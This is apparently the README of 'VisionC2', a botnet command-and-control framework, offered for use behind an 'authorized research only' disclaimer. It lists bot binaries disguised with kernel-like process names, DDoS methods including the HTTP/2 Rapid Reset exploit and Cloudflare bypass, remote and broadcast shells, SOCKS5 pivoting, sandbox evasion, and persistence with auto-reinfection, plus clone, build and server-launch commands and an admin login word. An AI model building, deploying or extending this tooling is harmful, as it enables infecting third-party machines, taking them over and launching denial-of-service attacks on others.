14-arch cross-compiled agents DDOS, RCE, and SOCKS5 modules. Communcations protected by TLS 1.3 transport + 6-Layer C2 Address Obfuscation + AES-128-CTR string encryption, Anti-Anaylsis/Sandbox Killer and full persistence — driven through a real-time Go TUI
| Feature | Details | |
|---|---|---|
| 🔧 | Auto-Setup | Python script automates config + build |
| 🌐 | Cross-Platform | 14 multi-arch targets, custom UPX packer (strips headers) |
| 🔒 | Comms | TLS 1.3 on port 443, indistinguishable from standard HTTPS |
| 🧦 | SOCKS5 Proxy | Full pivoting, RFC 1929 auth, runtime credential updates |
| 💻 | Remote Shell | Command execution + output capture, Linux shortcuts & post-exploit helpers |
| 🛡️ | Evasion | 6-layer C2 encryption (AES-128-CTR + obfuscation), encrypted strings, split XOR key, 40+ VM/sandbox/debugger signatures, 24–27h delayed exit |
| 👻 | Stealth | Unix daemonization, single-instance, disguised process names, PID lock |
| 🔁 | Persistence | Systemd + cron + rc.local, hidden dir w/ download script, auto-reinfection, cleanup tool included |
Layer 4 — Network/Transport
| Method | Description |
|---|---|
| UDP Flood | High-volume 1024-byte payload spam |
| TCP Flood | Connection table exhaustion |
| SYN Flood | SYN packets with randomized source ports (raw TCP) |
| ACK Flood | ACK packet flooding (raw TCP) |
| GRE Flood | GRE protocol (47) packets with max payload |
| DNS Flood | Randomized DNS query types (DNS Reflection Attack, Max PPS+) |
Layer 7 — Application
| Method | Description |
|---|---|
| HTTP Flood | GET/POST with randomized headers + user-agents |
| HTTPS/TLS Flood | TLS handshake exhaustion + burst requests |
| CF Bypass | Cloudflare bypass via session/cookie reuse + fingerprinting |
| Rapid Reset | HTTP/2 exploit (CVE-2023-44487) with batched HEADERS + RST_STREAM |
| Proxy Support | Full proxy integration for all L7 methods (HTTP + SOCKS5) |
sudo apt update && sudo apt install -y upx-ucl openssl git wget gcc python3 screen netcat
# Go 1.23+
wget https://go.dev/dl/go1.23.0.linux-amd64.tar.gz
sudo rm -rf /usr/local/go && sudo tar -C /usr/local -xzf go1.23.0.linux-amd64.tar.gz
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc && source ~/.bashrc| Requirement | Minimum | Recommended |
|---|---|---|
| RAM / Storage | 512MB / 1GB | 2GB+ / 5GB+ |
| OS | Linux (any) | Ubuntu 22.04+ / Debian 12+ |
| Network | Port 443 open | + Admin port for split mode |
git clone https://github.com/Syn2Much/VisionC2.git && cd VisionC2
python3 setup.py # Select [1] Full SetupThe wizard prompts for C2 address, admin port (default: 420), and TLS cert details. Output:
bins/ → 14 bot binaries (multi-arch)
cnc/certificates/ → server.crt + server.key
server → CNC binary
setup_config.txt → Config summary
To change C2 address later: python3 setup.py → option [2]. Redeploy bots afterward.
./server # TUI mode (default, recommended)
./server --split # Telnet mode on admin port (default: 420)Split mode connect: nc YOUR_IP 420 → type spamtec → login.
Background: screen -S vision ./server (detach: Ctrl+A, D)
First run creates root user with random password — save it.
| Key | Action |
|---|---|
↑/↓ or k/j |
Navigate |
Enter |
Select |
q / Esc |
Back / Cancel |
r |
Refresh |
- 🤖 Bot List — Live bot status.
Enter=shell,b=broadcast shell,l=attack,i=info,p=persist,r=reinstall,k=kill - 💻 Remote Shell — Interactive shell to one bot.
Ctrl+F=clear,Ctrl+P=persist,Ctrl+R=reinstall - 📡 Broadcast Shell — Command all bots.
Ctrl+A=filter arch,Ctrl+G=filter RAM,Ctrl+B=limit bots - ⚡ Launch Attack — Select method, target, port, duration →
lto launch - 📊 Ongoing Attacks — Progress bars + time remaining.
s=stop all - 🧦 Socks Manager —
s=start socks,x=stop. Default:socks5://user:pass@BOT_IP:1080. Update creds:!socksauth <user> <pass> - 📜 Connection Logs — Bot connect/disconnect history
| Binary | Architecture | Use Case |
|---|---|---|
| ethd0 | x86_64 (amd64) | Servers, desktops |
| kworkerd0 | x86 (386) | 32-bit systems |
| ip6addrd | ARM64 | Raspberry Pi 4, phones |
| mdsync1 | ARMv7 | Raspberry Pi 2/3 |
| deferwqd | MIPS | Routers |
| devfreqd0 | MIPSLE | Routers (little-endian) |
| ...and 8 more | Various | IoT, embedded |
Build.sh| Full binary map reference
-
cnc/— Command & Control server. Dual-listener architecture: TLS on port 443 for bot connections, Interactive TUI built with Bubble Tea. RBAC with four permission levels (Basic/Pro/Admin/Owner) defined inusers.json. -
bot/— Agent deployed to targets. Connects back to CNC over TLS 1.3. Lifecycle: decrypt config → daemonize → singleton lock → sandbox detection → install persistence → DNS-resolve C2 → connect with reconnect loop.
| File | Purpose |
|---|---|
bot/config.go |
All configuration: AES-encrypted C2 address (encGothTits), crypto seed, magic code, protocol version, encrypted string blobs |
bot/connection.go |
TLS connection, multi-method DNS resolution chain (DoH → UDP → A record → raw) |
bot/attacks.go |
All L4/L7 DDoS methods |
bot/opsec.go |
AES encryption, key derivation, sandbox/VM/debugger detection |
bot/persist.go |
Persistence via systemd, cron, rc.local |
bot/socks.go |
SOCKS5 proxy with RFC 1929 auth |
cnc/ui.go |
Bubble Tea TUI — all views, keybindings, rendering |
cnc/cmd.go |
Command dispatch and routing to bots |
cnc/connection.go |
Bot connection handling, TLS setup, heartbeat |
cnc/miscellaneous.go |
RBAC, user authentication, utilities |
- C2 address: 6-layer encoding pipeline — AES-128-CTR outer layer wrapping 5 inner layers (MD5 checksum → byte substitution → RC4 → XOR rotating key → base64). The AES-encrypted blob is decrypted at runtime then decoded in a 5 step decryption process)
- Sensitive strings: AES-128-CTR with key derived from 16 split XOR functions. Encrypted at build time via
tools/crypto.go, decrypted at runtime byinitSensitiveStrings() - Transport: TLS 1.3 with self-signed certificates (generated by
setup.pyincnc/certificates/)
| Document | Description |
|---|---|
ARCHITECTURE.md |
Full system architecture |
CHANGELOG.md |
Version history and changes |
COMMANDS.md |
Command reference |
SETUP.md |
Setup guide |
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATIONAL PURPOSES ONLY
Usage of this tool for attacking targets without prior mutual consent is illegal. The developer assumes no liability and is not responsible for any misuse or damage caused by this program.
Syn2Much — dev@sinnners.city · @synacket
